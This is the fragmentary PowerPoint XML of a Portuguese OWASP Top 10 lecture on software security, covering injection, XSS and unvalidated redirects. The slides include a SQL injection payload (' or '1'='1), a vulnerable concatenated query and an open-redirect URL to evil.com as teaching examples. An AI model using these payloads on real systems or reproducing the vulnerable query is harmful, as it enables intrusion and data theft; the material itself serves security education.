              <a:t>Comum em SQL, LDAP, XPath, Comandos de OS...</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="pt-B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pt-B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Impacto</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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técnico</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-B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Pode afetar à integridade dos dados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="91440" indent="-228600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</a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="1" indent="-228600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</a:pP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Depende do valor dos dados armazenados.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676400"/>
            <a:ext cx="7610902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953151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Redirecionamentos não validados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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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Fraqueza:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicações que frequentemente redirecionam o usuário para diferentes páginas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Normalmente as páginas para onde se redirecionam os usuários possuem malwares ou enganam para roubo de senhas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Perda da confianças dos usuários.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50</a:t>
            </a:fld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676400"/>
            <a:ext cx="7696200" cy="1241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01480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Redirecionamentos não validados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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Revisar o código todo em busca de redirecionamentos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Verificar se há validação na utilização de apenas URLs válidas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilizar web spider para checar se todos redirecionamentos são válidos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Verificar se todos parâmetros que contêm URL são devidamente redirecionados.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51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8147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Redirecionamentos não validados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Como evitar redirecionamentos não validados em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Evitar o uso de redirecionamentos na aplicação. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Caso usados, não utilizar parâmetros informados pelo usuário nesse redirecionamento.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Caso necessário entrada do usuário, validar a entrada do mesmo e também sua autorização.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Utilizar APIs para geração da URL.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52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41678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Redirecionamentos não validados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Cenário de ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicação chama a página redirect.jsp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Recebe um parâmetro – url.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante cria uma página maliciosa onde pode fazer o ataque ao usuário.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.example.com/redirect.jsp?url=evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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53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79395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Resumo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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54</a:t>
            </a:fld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9110" y="1772816"/>
            <a:ext cx="8279372" cy="4947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307910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smtClean="0"/>
              <a:t>Maiores informações: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http://www.owasp.org/index.php/Main_Page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Developer guide:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Category:OWASP_Guide_Project</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Testing guide:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Category:OWASP_Testing_Project</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Code Review guide:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Lista de ameaças:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://cwe.mitre.org/data/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0"/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55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0222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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Só pode ser garantido se testarmos com todas entradas possíveis na aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Deve ser revisado o código para garantir o tratamento correto de todas entradas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Pode ser utilizado ferramentas de scanner para automatizar a injeção na aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Tratamento incorreto de erros ajuda na descoberta de aplicações vulneráveis.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2136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Como previnir injection em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Manter os dados recebidos (fontes não-confiáveis) separados dos comandos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Dar preferência na utilização de APIs fornecidas pelas linguagem de programação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Caso não haja API para tal, deve-se tratar corretamente os dados recebidos. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html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Manter uma lista de caracteres ou palavras para ser checadas é uma alteranativa, porém não é a melhor.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1332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smtClean="0"/>
              <a:t>Cenário do ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Aplicação confia no dado que recebe para construir a consulta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Atacante modifica o parâmetro id para enviar ' or '1'='1 .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://example.com/app/accountView?id=' or '1'='1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Neste caso com isso o atacante consegue exibir a lista completa de contas do banco de dados.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3709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Cross-Site Scripting (XSS)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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer um que consiga enviar dados não confiáveis para a aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante envia texto simples contendo o código malicioso, buscando explorar a vulnerabilidade da interpretação desse código pelo navegador.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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9</a:t>
            </a:fld>
            <a:endParaRPr lang="pt-BR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676400"/>
            <a:ext cx="7716453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595854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no">
  <a:themeElements>
    <a:clrScheme name="Pino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ino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n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2076</TotalTime>
  <Words>2978</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Apresentação na tela (4:3)</PresentationFormat>
  <Paragraphs>415</Paragraphs>
  <Slides>55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55</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="63" baseType="lpstr">
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Constantia</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Rage Italic</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Pino</vt:lpstr>
      <vt:lpstr>Segurança de Software Aula 6 – Top 10 owasp</vt:lpstr>
      <vt:lpstr>Riscos</vt:lpstr>
      <vt:lpstr>Riscos</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Quebra de autenticação e controle de sessão</vt:lpstr>
      <vt:lpstr>Quebra de autenticação e controle de sessão</vt:lpstr>
      <vt:lpstr>Quebra de autenticação e controle de sessão</vt:lpstr>
      <vt:lpstr>Quebra de autenticação e controle de sessão</vt:lpstr>
      <vt:lpstr>Quebra de autenticação e controle de sessão</vt:lpstr>
      <vt:lpstr>Referência Direta a Objetos </vt:lpstr>
      <vt:lpstr>Referência Direta a Objetos </vt:lpstr>
      <vt:lpstr>Referência Direta a Objetos </vt:lpstr>
      <vt:lpstr>Referência Direta a Objetos </vt:lpstr>
      <vt:lpstr>Referência Direta a Objetos </vt:lpstr>
      <vt:lpstr>CSFR (Cross Site Request Forgery)</vt:lpstr>
      <vt:lpstr>CSFR (Cross Site Request Forgery)</vt:lpstr>
      <vt:lpstr>CSFR (Cross Site Request Forgery)</vt:lpstr>
      <vt:lpstr>CSFR (Cross Site Request Forgery)</vt:lpstr>
      <vt:lpstr>CSFR (Cross Site Request Forgery)</vt:lpstr>
      <vt:lpstr>Má configuração de aplicações</vt:lpstr>
      <vt:lpstr>Má configuração de aplicações</vt:lpstr>
      <vt:lpstr>Má configuração de aplicações</vt:lpstr>
      <vt:lpstr>Má configuração de aplicações</vt:lpstr>
      <vt:lpstr>Má configuração de aplicações</vt:lpstr>
      <vt:lpstr>Armazenamento  com criptografia insegura</vt:lpstr>
      <vt:lpstr>Armazenamento  com criptografia insegura</vt:lpstr>
      <vt:lpstr>Armazenamento  com criptografia insegura</vt:lpstr>
      <vt:lpstr>Armazenamento  com criptografia insegura</vt:lpstr>
      <vt:lpstr>Armazenamento  com criptografia insegura</vt:lpstr>
      <vt:lpstr>Restrição de Acesso a URL </vt:lpstr>
      <vt:lpstr>Restrição de Acesso a URL </vt:lpstr>
      <vt:lpstr>Restrição de Acesso a URL </vt:lpstr>
      <vt:lpstr>Restrição de Acesso a URL </vt:lpstr>
      <vt:lpstr>Restrição de Acesso a URL </vt:lpstr>
      <vt:lpstr>Comunicação insegura</vt:lpstr>
      <vt:lpstr>Comunicação insegura</vt:lpstr>
      <vt:lpstr>Comunicação insegura</vt:lpstr>
      <vt:lpstr>Comunicação insegura</vt:lpstr>
      <vt:lpstr>Comunicação insegura</vt:lpstr>
      <vt:lpstr>Redirecionamentos não validados</vt:lpstr>
      <vt:lpstr>Redirecionamentos não validados</vt:lpstr>
      <vt:lpstr>Redirecionamentos não validados</vt:lpstr>
      <vt:lpstr>Redirecionamentos não validados</vt:lpstr>
      <vt:lpstr>Redirecionamentos não validados</vt:lpstr>
      <vt:lpstr>Resumo</vt:lpstr>
      <vt:lpstr>Referências</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Juliano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da exposição voluntária de informações privadas na internet</dc:title>
  <dc:creator>Rochelle</dc:creator>
  <cp:lastModifiedBy>Rodrigo Narvaes Figueira</cp:lastModifiedBy>
  <cp:revision>164</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-12-08T16:02:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-28T19:33:45Z</dcterms:modified>
</cp:coreProperties>
</file>